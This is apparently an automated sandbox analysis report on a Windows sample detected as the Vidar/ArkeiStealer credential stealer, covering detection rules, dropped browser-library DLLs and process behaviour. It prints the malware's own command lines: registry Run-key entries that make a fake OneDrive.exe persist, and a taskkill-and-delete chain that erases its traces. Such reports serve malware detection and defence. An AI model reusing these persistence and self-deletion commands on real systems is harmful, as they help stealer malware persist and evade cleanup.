Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen

Source: MzRn1YNrbz.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F21868	0_2_00F21868
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F2504D	0_2_00F2504D
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F28BED	0_2_00F28BED
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F13B40	0_2_00F13B40
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F10B43	0_2_00F10B43
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F2344F	0_2_00F2344F
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F1D7C9	0_2_00F1D7C9
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F24F2D	0_2_00F24F2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_3_25548A88	2_3_25548A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00401000	14_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00403250	14_2_00403250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0042F030	14_2_0042F030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0042F262	14_2_0042F262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0042C4A0	14_2_0042C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0042F4BF	14_2_0042F4BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0042A53B	14_2_0042A53B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0043E6AD	14_2_0043E6AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_004357FE	14_2_004357FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_0043591E	14_2_0043591E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00427930	14_2_00427930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00439EF9	14_2_00439EF9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: String function: 004254D0 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: String function: 00430DB7 appears 147 times
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: String function: 00F0C5C0 appears 44 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Source: MzRn1YNrbz.exe

Static PE information: invalid certificate

Source: MzRn1YNrbz.exe	Metadefender: Detection: 28%
Source: MzRn1YNrbz.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MzRn1YNrbz.exe "C:\Users\user\Desktop\MzRn1YNrbz.exe"
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe "C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe"
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im AppLaunch.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe "C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im AppLaunch.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AppLaunch.exe")

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Software[1].exe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/19@5/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: nss3.dll.2.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.2.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: nss3.dll.2.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: nss3.dll.2.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: nss3.dll.2.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: nss3.dll.2.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 14_2_004069A0 CreateToolhelp32Snapshot,

14_2_004069A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: \Sessions\1\BaseNamedObjects\d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963user4
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: MzRn1YNrbz.exe

Static file information: File size 2805688 > 1048576

Source: MzRn1YNrbz.exe

Static PE information: Raw size of xczNltw is bigger than: 0x100000 < 0x260c00

Source: MzRn1YNrbz.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: MzRn1YNrbz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.2.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue.dll.2.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.2.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe

Code function: 0_2_00F0BEC3 push ecx; ret

0_2_00F0BED6

Source: MzRn1YNrbz.exe	Static PE information: section name: s1DXt
Source: MzRn1YNrbz.exe	Static PE information: section name: xczNltw
Source: MzRn1YNrbz.exe	Static PE information: section name: h9kRta
Source: MzRn1YNrbz.exe	Static PE information: section name: 116Za
Source: MzRn1YNrbz.exe	Static PE information: section name: GSiJoc
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr	Static PE information: section name: 5txNt
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr	Static PE information: section name: XvtVrHf
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr	Static PE information: section name: gUflta
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr	Static PE information: section name: Ysaja
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr	Static PE information: section name: 5Yuqoc
Source: Software[2].exe.2.dr	Static PE information: section name: 5txNt
Source: Software[2].exe.2.dr	Static PE information: section name: XvtVrHf
Source: Software[2].exe.2.dr	Static PE information: section name: gUflta
Source: Software[2].exe.2.dr	Static PE information: section name: Ysaja
Source: Software[2].exe.2.dr	Static PE information: section name: 5Yuqoc
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: mozglue.dll.2.dr	Static PE information: section name: .didat
Source: OneDrive.exe.14.dr	Static PE information: section name: _RDATA

Source: initial sample

Static PE information: section where entry point is pointing to: s1DXt

Source: OneDrive.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x3a04b
Source: MzRn1YNrbz.exe	Static PE information: real checksum: 0x1cf should be: 0x2b7f26
Source: Software[2].exe.2.dr	Static PE information: real checksum: 0x1dc should be: 0x61747f
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr	Static PE information: real checksum: 0x1dc should be: 0x61747f
Source: Secur32.dll.14.dr	Static PE information: real checksum: 0x0 should be: 0x5505a

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: reg.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Software[2].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AppLaunch.exe, 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp

